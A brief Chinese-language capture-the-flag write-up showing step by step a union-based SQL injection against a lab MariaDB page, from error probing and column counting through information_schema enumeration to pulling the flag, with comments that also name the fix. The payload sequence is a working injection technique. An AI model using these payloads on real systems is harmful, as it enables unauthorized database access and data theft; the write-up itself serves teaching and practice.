题目链接

> ?wllm=1'	# 尝试看看是否为sql查询
< You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''1'' LIMIT 0,1' at line 1
# 说明后端是 MariaDB,参数 wllm 被直接拼接进 SQL 语句,存在注入漏洞;数据库原始报错被回显给客户端,本身也是信息泄露(修复应使用参数化查询并关闭错误回显)

> ?wllm=1' order by 3--+
< Your Login name:xxx
Your Password:yyy # 正常
> ?wllm=1' order by 4--+
< Unknown column '4' in 'order clause' # 异常
# order by 3 正常而 order by 4 报错,说明原查询返回的列数为3,接着使用联合查询

> ?wllm=1' union select 1,2,3--+
< Your Login name:xxx
Your Password:yyy # 正常
> ?wllm=1' union select 1,2,3 limit 1,1--+ # limit 1,1 表示跳过第1行(原查询结果)、只取1行,即显示 union 拼接出的那一行
< Your Login name:2
Your Password:3 # 说明 Login name 回显的是第二列,Password 回显的是第三列

# 获取database名
> ?wllm=1' union select 1,2,database() limit 1,1--+
< Your Login name:2
Your Password:test_db

# 获取tables
> ?wllm=1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='test_db' limit 1,1--+
< Your Login name:2
Your Password:test_tb,users

# 获取columns
> ?wllm=1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='test_tb' limit 1,1--+
< Your Login name:2
Your Password:id,flag

# 获取flag
> ?wllm=1' union select 1,2,flag from test_db.test_tb limit 1,1--+
< Your Login name:2
Your Password:NSSCTF{85fe17d6-6beb-479d-a957-c69fb83d8217}